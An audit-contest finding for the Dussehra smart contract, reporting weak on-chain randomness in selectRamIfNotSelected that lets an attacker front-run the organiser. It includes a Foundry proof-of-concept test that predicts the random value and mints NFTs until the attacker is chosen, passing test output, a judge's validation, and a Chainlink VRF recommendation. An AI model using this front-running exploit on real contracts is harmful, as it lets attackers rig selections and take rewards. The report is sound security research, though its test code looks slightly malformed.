First Flight #17: Dussehra

First Flight #17

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: low

Valid

Weak Pseudo-Random Number Generators can let attacker frontrun before the organizer selects Ram and win the Ram selection

azanux

Summary

Bad randomness vulnerability occurs when a smart contract relies on a source of randomness that is not truly random or that can be predicted by an attacker. This can allow an attacker to manipulate the outcome of a transaction or gain an unfair advantage over other users.

Vulnerability Details

A Player can create a smart contract that frontrun the organiser when he execute selectRamIfNotSelected , this contract will check if by minting a new NFT the attacker could be select as Ram , so he mint NFT for free until he got select and let he organiser execute selectRamIfNotSelected , and after that he could get reward

Impact

A attacker can frontrun the organiser during selectRamIfNotSelected and be selected as RAM and get the reward.

Code Example

This code is to be added into the smart contract Dussehra.sol#CounterTest:

function test_FrontRunSelectRamIfNotSelected() public participants {

vm.warp(1728691200 + 1);

address attacker = address(0x123);

// get the value of the ramdom for the next mint NFT

uint256 random = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao))) % (ramNFT.tokenCounter()+ 1);

console.log("random : ", random);

//attacker check if by minting new NFT he could be selected as Ram

while (random != ramNFT.tokenCounter()+ 1 ) {

ramNFT.mintRamNFT(attacker);

console.log("Counter : ", ramNFT.tokenCounter());

if(random == ramNFT.tokenCounter()-1) {

break;

}

vm.startPrank(organiser);

choosingRam.selectRamIfNotSelected();

vm.stopPrank();

assertEq(choosingRam.isRamSelected(), true);

assertEq(choosingRam.selectedRam(), attacker);

}

Result
The attacker is selected as RAM

Ran 1 test for test/Dussehra.t.sol:CounterTest

[PASS] test_FrontRunSelectRamIfNotSelected() (gas: 441490)

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.60ms (1.22ms CPU time)

Ran 1 test suite in 165.46ms (7.60ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used

Manual review.

Recommendations

Use Chainlink or an Oracle. Chainlink VRF (Verifiable Random Function) is a provably fair and verifiable random number generator (RNG) that enables smart contracts to access random values without compromising security or usability.

Updates

Lead Judging Commences

bube Lead Judge about 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

Weak randomness in `ChoosingRam::selectRamIfNotSelected`

The organizer is trusted, but the function `ChoosingRam::selectRamIfNotSelected` uses a way to generate a random number that is not completely random.

Rewards breakdown

nSLOC

218

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.